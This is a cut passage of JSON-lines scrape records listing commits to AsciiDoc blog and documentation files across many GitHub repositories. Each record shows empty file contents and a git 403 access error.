2015-05-30-Hello-World-my-tech-introduction.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World-my-tech-introduction.adoc","new_file":"_posts\/2015-05-30-Hello-World-my-tech-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ef4a873d69ccd4983dcf7339a39bbf7dc63513","subject":"Update 2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","message":"Update 2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","new_file":"_posts\/2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95801fd45a6f5f96acdf1032e008df25cff1e291","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"299dd2dd7a3745b454100f87228ce6fbf770e093","subject":"Update 2016-12-06-problem-solving-algorithm-basic.adoc","message":"Update 2016-12-06-problem-solving-algorithm-basic.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algorithm-basic.adoc","new_file":"_posts\/2016-12-06-problem-solving-algorithm-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb6c77c63fbffbffe9b98c5214a97d1b289d19a3","subject":"Update 2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","message":"Update 2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","repos":"yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io","old_file":"_posts\/2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","new_file":"_posts\/2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yaks-all-the-way-down\/hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d1c747e7ea2ee8c4d17380020926182af3e6b43","subject":"Update 2017-05-28-Java-Naming-Conventions.adoc","message":"Update 2017-05-28-Java-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-28-Java-Naming-Conventions.adoc","new_file":"_posts\/2017-05-28-Java-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"409da09a81e569e1d4be993d5045f85364a0df89","subject":"[DOCS] Re-adds custom realm","message":"[DOCS] Re-adds custom realm\n","repos":"gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/authentication\/custom-realm.asciidoc","new_file":"x-pack\/docs\/en\/security\/authentication\/custom-realm.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9e5f58c5711a684194bb6817452a881cd29805c","subject":"y2b create post iPhone 7 Plus - Hands On With Prototype!","message":"y2b create post iPhone 7 Plus - Hands On With Prototype!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-03-iPhone-7-Plus--Hands-On-With-Prototype.adoc","new_file":"_posts\/2016-08-03-iPhone-7-Plus--Hands-On-With-Prototype.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d67480ff07e4b198339707167fcc04e8debc8dc","subject":"Update 2018-01-28-Having-fun-contributing-to-open-source.adoc","message":"Update 2018-01-28-Having-fun-contributing-to-open-source.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-01-28-Having-fun-contributing-to-open-source.adoc","new_file":"_posts\/2018-01-28-Having-fun-contributing-to-open-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f75ec9054ceef2e91aaf9e8bf5cae3b4c5e8b63","subject":"MySQL JSON support blog post","message":"MySQL JSON support blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2016-10-19-Support-for-MySQL-JSON-typpe-coming-soon.adoc","new_file":"blog\/2016-10-19-Support-for-MySQL-JSON-typpe-coming-soon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"081755157d30c0cc7342ee64ddaf41ff12de92d6","subject":"y2b create post Sega Dreamcast Unboxing - Almost Cried","message":"y2b create post Sega Dreamcast Unboxing - Almost Cried","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-30-Sega-Dreamcast-Unboxing--Almost-Cried.adoc","new_file":"_posts\/2015-03-30-Sega-Dreamcast-Unboxing--Almost-Cried.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b72eca229c88149d45221ba914e1390eb2756fe2","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d989c77de3de48ad388bd18e75f286f4dbb42e","subject":"Update 2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","message":"Update 2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","new_file":"_posts\/2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ab975ea9487c395ed0efa7346003239a94f0cea","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7ed1b0530f499dcb2de271c270bc56c619b415e","subject":"y2b create post Gamepad Controller for Razer Edge Unboxing \\u0026 Demo + Razer Edge Docking Station","message":"y2b create post Gamepad Controller for Razer Edge Unboxing \\u0026 Demo + Razer Edge Docking Station","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-16-Gamepad-Controller-for-Razer-Edge-Unboxing-u0026-Demo--Razer-Edge-Docking-Station.adoc","new_file":"_posts\/2013-04-16-Gamepad-Controller-for-Razer-Edge-Unboxing-u0026-Demo--Razer-Edge-Docking-Station.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee7e96cb0934770d1b9645fdfa852361ebc3baef","subject":"y2b create post FAKE APPLE WATCH","message":"y2b create post FAKE APPLE WATCH","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-06-FAKE-APPLE-WATCH.adoc","new_file":"_posts\/2015-02-06-FAKE-APPLE-WATCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c774fddfbfe80eac65c19139b559aaf9224fc33a","subject":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","message":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f5da4484b9aa884aea9ce124db0be81c0ba12a0","subject":"y2b create post MacBook Air 2012 Review (13\\","message":"y2b create post MacBook Air 2012 Review (13\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-06-15-MacBook-Air-2012-Review-13.adoc","new_file":"_posts\/2012-06-15-MacBook-Air-2012-Review-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b24d75cc82e0f7e97e05aac1dd30c28bd5a35b60","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be3d8ac40c6e083cdb78d061a2e9e1e8029ef0f5","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c778e038b9eb5217754016960879d2146b4e2bf1","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03819063833ceb3dc0e9e1f2bc430d5b454b0146","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a87037d4ecc82f43c2f154dcfb114d25cc6171a5","subject":"Update 2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","message":"Update 2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","new_file":"_posts\/2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2d1f120aa5b5ce50441bb849ffcabe516babd5b","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"756cb4c49572d84dcd2db10da78470271a753a29","subject":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","message":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68be09dfe622fa296c3cee4fde0773d8c644651c","subject":"y2b create post The Unboxing Time Machine - Nintendo 64","message":"y2b create post The Unboxing Time Machine - Nintendo 64","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-24-The-Unboxing-Time-Machine--Nintendo-64.adoc","new_file":"_posts\/2016-11-24-The-Unboxing-Time-Machine--Nintendo-64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64cebe72bf19932788d4d78483f8dce81ed913d7","subject":"Update 2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","message":"Update 2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4171597a3d48d847c7e030f434562653991fc8bf","subject":"integration points doc","message":"integration points doc\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/liferay-integration-points\/liferay-integration-points.adoc","new_file":"2014\/liferay-integration-points\/liferay-integration-points.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"054f9f64d3ca3762e33d0b4bfcc96a075d78a7f3","subject":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","message":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf959aaf67b8e67fab0dcf6686fa6758b8722b69","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71a3a06efaa6032b707bab3d3e40d9d24ed8ef44","subject":"Renamed '_posts\/2017-09-24-Backdoor-CTF-2017.adoc' to '_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc'","message":"Renamed '_posts\/2017-09-24-Backdoor-CTF-2017.adoc' to '_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958a4d860cc3922976eb09c8cc5e28b4cccbd1a2","subject":"Update 2011-07-07-Code-compare-SHA-1-sur-Android-iOS.adoc","message":"Update 2011-07-07-Code-compare-SHA-1-sur-Android-iOS.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-07-Code-compare-SHA-1-sur-Android-iOS.adoc","new_file":"_posts\/2011-07-07-Code-compare-SHA-1-sur-Android-iOS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5039b4f3a08b8dc9066a444647bad343c8b9f40","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"191d4a8000e5604aa57c125d57ce6214f4add53b","subject":"Update 2016-07-01-10-unfamiliar-features-in-Intelli-J-Idea.adoc","message":"Update 2016-07-01-10-unfamiliar-features-in-Intelli-J-Idea.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-07-01-10-unfamiliar-features-in-Intelli-J-Idea.adoc","new_file":"_posts\/2016-07-01-10-unfamiliar-features-in-Intelli-J-Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4514c50c72de55da10ee354fdf8e8db85ac9058","subject":"Update 2016-07-12-Episode-64-Posterising-in-the-H2-H-Lobby.adoc","message":"Update 2016-07-12-Episode-64-Posterising-in-the-H2-H-Lobby.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-12-Episode-64-Posterising-in-the-H2-H-Lobby.adoc","new_file":"_posts\/2016-07-12-Episode-64-Posterising-in-the-H2-H-Lobby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22ec2185c6d3f8a6dd25ec76cc569fffafc89bf6","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f3c02b62a8e313ea9b3422f3ac45f216024476e","subject":"Update 2018-09-16-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-09-16-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-16-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-09-16-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b8791c3c9211dc045581b65ec870f4d5484fb1f","subject":"Update server start instructions when port offset used","message":"Update server start instructions when port offset used\n","repos":"objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/btm\/serverinstall.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/btm\/serverinstall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f82c7bfdb0276d37d88c46a31876298c9a18bd28","subject":"Update 2016-10-30-Typescript-and-Sass-Webpack-Boilerplate.adoc","message":"Update 